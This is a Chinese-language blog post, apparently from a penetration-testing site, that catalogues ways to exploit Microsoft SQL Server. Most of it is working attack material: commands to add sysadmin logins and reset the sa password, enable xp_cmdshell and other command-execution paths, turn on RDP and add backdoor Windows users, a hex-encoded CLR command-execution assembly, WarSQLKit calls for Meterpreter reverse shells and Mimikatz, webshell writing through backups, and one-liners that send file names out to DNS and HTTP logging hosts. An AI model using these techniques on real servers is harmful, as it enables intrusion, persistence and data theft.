Mssql利用方式整理

13l00m 收录于类别攻防研究

2022-05-28 2022-05-28 约 2185 字预计阅读 5 分钟

警告

本文最后更新于 2022-05-28，文中内容可能已过时。

基础信息处理

主机用户信息

exec xp_logininfo

获取数据库可登录用户信息

select is_disabled, loginproperty(name,'Isexpired') is_expired, loginproperty(name,'Islocked') is_locked, * from sys.server_principals

获取当前用户可访问的数据库

SELECT * FROM sys.databases WHERE HAS_DBACCESS(name) = 1

获取数据库已连接用户及库名

1
2
3
4
5


select dbname=case  
  when dbid=0 then null  
  when dbid<>0 then db_name(dbid)  
  end, loginame from master..sysprocesses where hostname is not null
  group by dbid,loginame

获取数据库所有用户

SP_HELPUSER

获取所有数据库名

SELECT Name FROM Master..SysDatabases ORDER BY Name

SELECT name FROM master..sysdatabases WHERE name NOT IN ( 'master', 'model', 'msdb', 'tempdb', 'northwind','pubs' )

获取目标数据库表单信息

获取所有用户表

SELECT name FROM dbname..sysobjects Where xtype='U' ORDER BY name

获取所有系统表

SELECT name FROM dbname..sysobjects Where xtype='S' ORDER BY name

获取目标表单字段信息

SELECT * FROM syscolumns WHERE id=Object_Id('tablename')

获取目标表单内容

当前用户已经在目标数据库里时可直接使用如下命令获取表内容

select * from tablename

当前用户没进入目标数据库时执行上面命令会提示表不存在

垮裤查询使用库表拼接的方法即可：select * from dbname.dbo.tablename

修改数据库信息

添加管理账号

EXEC sp_addlogin 'sa_1','Passw0rd','master' –EXEC sp_addlogin 用户名，密码，默认数据库

EXEC sp_addsrvrolemember 'sa_1', 'sysadmin' –EXEC sp_addsrvrolemember 用户名，权限（sysadmin）

重置sa账号密码

exec sp_password null,'newPassw0rd','sa'

利用姿势

命令执行

xp_cmdshell

判断开启状态

1
2


select * from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'

开启xp_cmdshell

1
2
3
4
5
6


sp_configure 'show advanced options',1
reconfigure
go
sp_configure 'xp_cmdshell',1
reconfigure
go

关闭xp_cmdshell

EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 0;RECONFIGURE;

命令执行

exec master.dbo.xp_cmdshell 'whoami'

其他利用姿势

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40



# 信息搜集
exec master.dbo.xp_cmdshell 'whoami'
exec master.dbo.xp_cmdshell "whoami"
exec xp_cmdshell "whoami";
exec master..xp_cmdshell 'ipconfig/all'
exec master..xp_cmdshell 'systeminfo | findstr /B /C:"OS Name" /C:"OS Version"'
exec master..xp_cmdshell 'systeminfo | findstr /B /C:"OS 名称" /C:"OS 版本"'
exec master..xp_cmdshell 'wmic cpu get name,NumberOfCores,NumberOfLogicalProcessors/Format:List'
# 查询注册表，获取RDP端口号
exec master..xp_cmdshell 'reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber'
# 得到    PortNumber    REG_DWORD    0xd3d ，转换后就是3389
exec master..xp_cmdshell 'tasklist /svc | find "TermService" '
# 开启3389 Windows 2003
开启：
REG ADD \"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
关闭：
REG ADD \"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 11111111 /f
开启：
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1`
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
# 开启3389 Windows 2008
开启：
REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x00000d3d /f
# 修改防火墙 放行3389
netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow

# 添加账户，权限维持，不输出结果
exec master..xp_cmdshell 'Net user testuser passwd /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add',NO_OUTPUT
# 删除账户，不输出结果
EXEC master..xp_cmdshell 'net user testuser/delete', NO_OUTPUT
# 列目录
exec master..xp_cmdshell 'dir c:\'
exec xp_cmdshell 'dir c:\'

# 创建目录
exec master..xp_cmdshell 'mkdir "C:\test\"'
# 删除文件
exec master..xp_cmdshell 'del C:\test /f';

COM组件-SP_OACREATE(无回显)

判断开启状态

1
2


select * from master.dbo.sysobjects where xtype='x' and name='SP_OACREATE'
select count(*) from master.dbo.sysobjects where xtype='x' and name='SP_OACREATE'

开启组件

1
2


exec sp_configure 'show advanced options', 1; RECONFIGURE WITH OVERRIDE;   
exec sp_configure 'Ole Automation Procedures', 1; RECONFIGURE WITH OVERRIDE;

执行命令

1

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'cmd'

可通过dnslog、httplog平台接受命令执行结果

禁止堆叠注入情况下可尝试该方法执行命令

sp_execute_external_script

需安装高级分析扩展功能

开启组件

1
2


EXEC sp_configure 'external scripts enabled', 1
RECONFIGURE WITH OVERRIDE

执行命令(R)

1
2
3
4
5
6
7
8


sp_configure 'external scripts enabled'
GO
EXEC sp_execute_external_script
@language=N'R',
@script=N'OutputDataSet <- data.frame(system("cmd.exe
/c whoami",intern=T))'
WITH RESULT SETS (([cmd_out] text));
GO

代码执行(python)

1
2
3
4
5


exec sp_execute_external_script 
@language =N'Python',
@script=N'import sys
OutputDataSet = pandas.DataFrame([sys.version])'
WITH RESULT SETS ((python_version nvarchar(max)))

命令执行(python)

1
2
3
4
5
6


exec sp_execute_external_script 
@language =N'Python',
@script=N'import subprocess
p = subprocess.Popen("cmd.exe /c whoami", stdout=subprocess.PIPE)
OutputDataSet = pandas.DataFrame([str(p.stdout.read(), "utf-8")])'
WITH RESULT SETS (([cmd_out] nvarchar(max)))

计划任务

需开启sqlserver代理

1
2
3
4


USE msdb; 
EXEC dbo.sp_add_job @job_name = N'tmp_cmd'; 
EXEC sp_add_jobstep @job_name = N'tmp_cmd', @step_name = N'tmp_cmd1', @subsystem = N'PowerShell', @command = N'c:\windows\system32\cmd.exe /c whoami >c:\\1.txt', @retry_attempts = 1, @retry_interval = 5 ;EXEC dbo.sp_add_jobserver @job_name = N'tmp_cmd1'; 
EXEC dbo.sp_start_job N'tmp_cmd1';

CLR

开启组件

1
2
3
4


sp_configure 'clr enabled', 1
GO
RECONFIGURE
GO

设置TRUSTWORTHY 属性

ALTER DATABASE master SET TRUSTWORTHY ON;

创建程序集

1
2
3
4
5


CREATE ASSEMBLY [Database1]
    AUTHORIZATION [dbo]
    FROM 0x4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000504500004C0103006E587C5E0000000000000000E00022200B013000000E00000006000000000000522C0000002000000040000000000010002000000002000004000000000000000400000000000000008000000002000000000000030040850000100000100000000010000010000000000000100000000000000000000000002C00004F00000000400000A802000000000000000000000000000000000000006000000C000000C82A00001C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200000080000000000000000000000082000004800000000000000000000002E74657874000000580C000000200000000E000000020000000000000000000000000000200000602E72737263000000A8020000004000000004000000100000000000000000000000000000400000402E72656C6F6300000C0000000060000000020000001400000000000000000000000000004000004200000000000000000000000000000000342C00000000000048000000020005007C2200004C0800000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000CA00280600000A72010000706F0700000A00280600000A7243000070725300007002280800000A28020000066F0700000A002A001B300600BC0100000100001173040000060A00730900000A0B076F0A00000A026F0B00000A0003280C00000A16FE010D092C0F00076F0A00000A036F0D00000A0000076F0A00000A176F0E00000A00076F0A00000A176F0F00000A00076F0A00000A166F1000000A00076F0A00000A176F1100000A00076F0A00000A176F1200000A0006731300000A7D010000040706FE0605000006731400000A6F1500000A00140C00076F1600000A26076F1700000A00076F1800000A6F1900000A0C076F1A00000A0000DE18130400280600000A11046F1B00000A6F0700000A0000DE00076F1C00000A16FE01130511052C1D00280600000A067B010000046F1D00000A6F0700000A000038AA00000000731300000A130608280C00000A16FE01130711072C0B001106086F1E00000A2600067B010000046F1F00000A16FE03130811082C22001106725D0000706F1E00000A261106067B010000046F1D00000A6F1E00000A2600280600000A1C8D0E000001251602A2251703A225187275000070A22519076F1C00000A13091209282000000AA2251A72AD000070A2251B1106252D0426142B056F1D00000AA2282100000A6F0700000A0000067B010000046F1D00000A130A2B00110A2A011000000000970025BC0018080000012202282200000A002A4E027B01000004046F2300000A6F1E00000A262A00000042534A4201000100000000000C00000076342E302E33303331390000000005006C000000A8020000237E000014030000B403000023537472696E677300000000C8060000B4000000235553007C0700001000000023475549440000008C070000C000000023426C6F620000000000000002000001571502000902000000FA0133001600000100000014000000030000000100000005000000050000002300000005000000010000000100000003000000010000000000D60101000000000006007001BA0206009001BA0206004601A7020F00DA02000006003C03E4010A005A015A020E001503A7020600EB01E40106002C027A0306002B01BA020E00FA02A7020A0086035A020A0023015A020600C401E4010E000302A7020E00D200A7020E004102A70206001402400006002102400006003100E401000000003700000000000100010001001000E9020000150001000100030110000100000015000100040006007003790050200000000096008D007D000100842000000000960099001A0002005C22000000008618A102060004005C22000000008618A102060004006522000000008300160082000400000001007F0000000100F200000002002B03000001003A020000020010030900A10201001100A10206001900A1020A003100A10206005100A102060061001A0110006900A4001500710035031A003900A10206003900F50132007900E50015007100A403370079001D031500790091033C007900C20041007900AE013C00790087023C00790055033C004900A10206008900A1024700390068004D0039004F0353003900FB000600390075025700990083005C003900430306004100B6005C003900A90060002900C2015C0049000F0164004900CB016000A100C2015C00710035036A002900A1020600590056005C0020002300BA002E000B0089002E00130092002E001B00B10063002B00BA0020000480000000000000000000000000000000002700000004000000000000000000000070005F000000000004000000000000000000000070004A00000000000400000000000000000000007000E40100000000030002000000003C3E635F5F446973706C6179436C617373315F30003C52756E436F6D6D616E643E625F5F300044617461626173653100496E743332003C4D6F64756C653E0053797374656D2E494F0053797374656D2E44617461006765745F44617461006D73636F726C6962006164645F4F757470757444617461526563656976656400636D640052656164546F456E640045786563436F6D6D616E640052756E436F6D6D616E640053656E64006765745F45786974436F6465006765745F4D657373616765007365745F57696E646F775374796C650050726F6365737357696E646F775374796C65007365745F46696C654E616D650066696C656E616D6500426567696E4F7574707574526561644C696E6500417070656E644C696E65006765745F506970650053716C5069706500436F6D70696C657247656E6572617465644174747269627574650044656275676761626C654174747269627574650053716C50726F63656475726541747472696275746500436F6D70696C6174696F6E52656C61786174696F6E734174747269627574650052756E74696D65436F6D7061746962696C697479417474726962757465007365745F5573655368656C6C4578656375746500546F537472696E67006765745F4C656E677468004461746162617365312E646C6C0053797374656D00457863657074696F6E006765745F5374617274496E666F0050726F636573735374617274496E666F0053747265616D526561646572005465787452656164657200537472696E674275696C6465720073656E646572004461746152656365697665644576656E7448616E646C6572004D6963726F736F66742E53716C5365727665722E536572766572006765745F5374616E646172644572726F72007365745F52656469726563745374616E646172644572726F72002E63746F720053797374656D2E446961676E6F73746963730053797374656D2E52756E74696D652E436F6D70696C6572536572766963657300446562756767696E674D6F6465730053746F72656450726F63656475726573004461746152656365697665644576656E744172677300617267730050726F63657373007365745F417267756D656E747300617267756D656E747300436F6E636174004F626A6563740057616974466F7245786974005374617274007365745F52656469726563745374616E646172644F7574707574007374644F75747075740053797374656D2E546578740053716C436F6E74657874007365745F4372656174654E6F57696E646F770049734E756C6C4F72456D707479000000004143006F006D006D0061006E0064002000690073002000720075006E006E0069006E0067002C00200070006C006500610073006500200077006100690074002E00000F63006D0064002E00650078006500000920002F0063002000001753007400640020006F00750074007000750074003A0000372000660069006E00690073006800650064002000770069007400680020006500780069007400200063006F006400650020003D00200000053A0020000000593C457501949B4EAC85A8875A6084DC000420010108032000010520010111110400001235042001010E0500020E0E0E11070B120C121D0E0212210212250202080E042000123D040001020E0420010102052001011141052002011C180520010112450320000204200012490320000E0320000805200112250E0500010E1D0E08B77A5C561934E08903061225040001010E062002011C122D0801000800000000001E01000100540216577261704E6F6E457863657074696F6E5468726F777301080100070100000000040100000000000000006E587C5E00000000020000001C010000E42A0000E40C000052534453CEC8B2762812304EAEE7EF5EE4D9EC7901000000463A5C746F6F6C735F736F757263655C4461746162617365315C4461746162617365315C6F626A5C44656275675C4461746162617365312E706462000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000282C00000000000000000000422C0000002000000000000000000000000000000000000000000000342C0000000000000000000000005F436F72446C6C4D61696E006D73636F7265652E646C6C0000000000FF250020001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001001000000018000080000000000000000000000000000001000100000030000080000000000000000000000000000001000000000048000000584000004C02000000000000000000004C0234000000560053005F00560045005200530049004F004E005F0049004E0046004F0000000000BD04EFFE00000100000000000000000000000000000000003F000000000000000400000002000000000000000000000000000000440000000100560061007200460069006C00650049006E0066006F00000000002400040000005400720061006E0073006C006100740069006F006E00000000000000B004AC010000010053007400720069006E006700460069006C00650049006E0066006F0000008801000001003000300030003000300034006200300000002C0002000100460069006C0065004400650073006300720069007000740069006F006E000000000020000000300008000100460069006C006500560065007200730069006F006E000000000030002E0030002E0030002E00300000003C000E00010049006E007400650072006E0061006C004E0061006D00650000004400610074006100620061007300650031002E0064006C006C0000002800020001004C006500670061006C0043006F00700079007200690067006800740000002000000044000E0001004F0072006900670069006E0061006C00460069006C0065006E0061006D00650000004400610074006100620061007300650031002E0064006C006C000000340008000100500072006F006400750063007400560065007200730069006F006E00000030002E0030002E0030002E003000000038000800010041007300730065006D0062006C0079002000560065007200730069006F006E00000030002E0030002E0030002E0030000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000C000000543C00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
    WITH PERMISSION_SET = UNSAFE;
GO

1
2
3
4


CREATE PROCEDURE [dbo].[ExecCommand]
@cmd NVARCHAR (MAX)
AS EXTERNAL NAME [Database1].[StoredProcedures].[ExecCommand]
go

命令执行

exec dbo.ExecCommand "whoami"

WarSQLKit(基于CLR的集成工具)

项目地址：https://github.com/mindspoof/MSSQL-Fileless-Rootkit-WarSQLKit

获取十六进制程序集代码

将MSSQL-Fileless-Rootkit-WarSQLKit-master\WarSQLKit\bin\Debug\WarSQLKit.dacpac文件解压获取model.xml

获取代码

同样需启用CLR

1
2
3
4


sp_configure 'clr enabled', 1
GO
RECONFIGURE
GO

设置TRUSTWORTHY 属性

ALTER DATABASE master SET TRUSTWORTHY ON;

导入程序集

1
2
3
4
5


CREATE ASSEMBLY [WarSQLKit]
    AUTHORIZATION [dbo]
    FROM  获取的十六进制
    WITH PERMISSION_SET = UNSAFE;
GO

创建存储过程

1
2
3
4
5
6


CREATE PROCEDURE sp_cmdExec
@Command [nvarchar](4000)
WITH EXECUTE AS CALLER
AS
EXTERNAL NAME WarSQLKit.StoredProcedures.CmdExec
GO

其他相关用法

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15


EXEC sp_cmdExec 'whoami'; => Any Windows command
EXEC sp_cmdExec 'whoami /RunSystemPriv'; => Any Windows command with NT AUTHORITY\SYSTEM rights
EXEC sp_cmdExec '"net user eyup P@ssw0rd1 /add" /RunSystemPriv'; => Adding users with RottenPotato (Kumpir)
EXEC sp_cmdExec '"net localgroup administrators eyup /add" /RunSystemPriv'; => Adding user to localgroup with RottenPotato (Kumpir)
EXEC sp_cmdExec 'powershell Get-ChildItem /RunSystemPS'; => (Powershell) with RottenPotato (Kumpir)
EXEC sp_cmdExec 'sp_meterpreter_reverse_tcp LHOST LPORT GetSystem'; => x86 Meterpreter Reverse Connection with  NT AUTHORITY\SYSTEM
EXEC sp_cmdExec 'sp_x64_meterpreter_reverse_tcp LHOST LPORT GetSystem'; => x64 Meterpreter Reverse Connection with  NT AUTHORITY\SYSTEM
EXEC sp_cmdExec 'sp_meterpreter_reverse_rc4 LHOST LPORT GetSystem'; => x86 Meterpreter Reverse Connection RC4 with  NT AUTHORITY\SYSTEM, RC4PASSWORD=warsql
EXEC sp_cmdExec 'sp_meterpreter_bind_tcp LPORT GetSystem'; => x86 Meterpreter Bind Connection with  NT AUTHORITY\SYSTEM
EXEC sp_cmdExec 'sp_Mimikatz'; 
select * from WarSQLKitTemp => Get Mimikatz Log. Thnks Benjamin Delpy :)
EXEC sp_cmdExec 'sp_downloadFile http://eyupcelik.com.tr/file.exe C:\ProgramData\file.exe 300';  => Download File
EXEC sp_cmdExec 'sp_getSqlHash';  => Get MSSQL Hash
EXEC sp_cmdExec 'sp_getProduct';  => Get Windows Product
EXEC sp_cmdExec 'sp_getDatabases';  => Get Available Database

目录/文件操作

列目录

xp_dirtree

列出当前路径下所有目录、子目录、文件 execute master..xp_dirtree 'c:'

列出当前路径目录、文件execute master..xp_dirtree 'c:',1,1

列出当前路径目录execute master..xp_dirtree 'c:',1

xp_subdirs

只能列出当前目录下子目录,无法列出文件xp_subdirs 'c:\';

读文件

Bulk_Insert_读文件

1
2
3


create table res(res varchar(8000));
bulk insert res from 'filepath';
select * from res

判断文件存在

xp_fileexist

exec master.sys.xp_fileexist 'filepath'

写文件

sp_oacreate-filesystemobject

1
2
3
4
5


declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_oacreate 'scripting.filesystemobject',@o out
exec sp_oamethod @o, 'createtextfile', @f out, 'e:\1.txt', 1
exec @ret = sp_oamethod @f, 'writeline', NULL ,'This is the test string'

差异备份

1
2
3
4


backup database dbname to disk = 'c:\temp\bak.bak';
create table dbname..t4(a image);
insert into dbname..t4(a) values (0x6173617364617364613c25206f75742e7772697465282231336c30306d3122293b20253e6164617364736164);
backup database dbname to disk = 'c:\temp\s1.jsp' with differential , format ;

Log备份

1
2
3
4
5


alter database 库名 set RECOVERY FULL 
create table cmd (a image) 
backup log 库名 to disk = 'c:\temp\1.log' with init 
insert into cmd (a) values (0x6173617364617364613c25206f75742e7772697465282231336c30306d3122293b20253e6164617364736164) 
backup log 库名 to disk = 'c:\temp\2.jsp'

利用DNSLOG外带信息

适用于执行命令无法回显或基于延时注入回显过慢的情况

依赖Python

dnslog

for /r "C:\" %i in (login.*) do @python3 -c "import base64,sys,os;st = base64.b64encode('{}'.format(sys.argv[1]).encode()).decode();os.system('ping {}.6b9edb44.dns.1433.eu.org -n 1'.format(st))" %i

httplog

for /r "C:\" %i in (login.*) do @python3 -c "import base64,sys,os;st = base64.b64encode('{}'.format(sys.argv[1]).encode()).decode();os.system('certutil -urlcache -split -f http://zmyyrb.ceye.io/{} tmp.bin'.format(st))" %i

依赖Powershell

dnslog

for /r "C:\" %i in (login.*) do @powershell -c "$data = [Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes(\"%i\"));ping "$data'.'zmyyrb.ceye.io""

httplog

for /r "C:\" %i in (login.*) do @powershell -c "$data = [Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes(\"%i\"));certutil -urlcache -split -f "http://zmyyrb.ceye.io/$data""

for /r "C:\" %i in (login.*) do @powershell -c "$data = [Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes(\"%i\"));curl "http://zmyyrb.ceye.io/$data""

for /r "C:\" %i in (login.*) do @powershell -c "$data = [Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes(\"%i\")); [System.Net.WebRequest]::Create(\"http://zmyyrb.ceye.io/$data\").GetResponse();"

参考文章

https://ruyueattention.github.io/2021/07/21/CVE-2021-1675/

https://xz.aliyun.com/t/10955#toc-10